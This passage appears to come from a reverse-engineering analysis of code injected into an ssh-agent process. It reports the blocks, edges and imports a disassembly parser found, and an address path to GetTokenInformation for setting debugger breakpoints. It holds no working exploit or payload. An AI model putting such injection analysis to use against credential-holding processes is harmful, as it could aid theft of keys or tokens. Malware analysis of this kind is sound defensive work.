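On the excerpt the parser finds 20 blocks and 25 edges, two blocks with direct imports (503 CloseHandle, 528 GetTokenInformation), and the entry-to-GetTokenInformation path d28090 -> d28184 -> d2818c -> d28115 -> d28119 -> d2811c -> d2820f -> d28215 -> d28224 -> d281d7 -> d280ca, which is the address trail to set breakpoints on when re-running the injected ssh-agent image under a debugger. Because the dump is a disassembly snapshot rather than an execution trace, the path only says the call is reachable, not that it was taken.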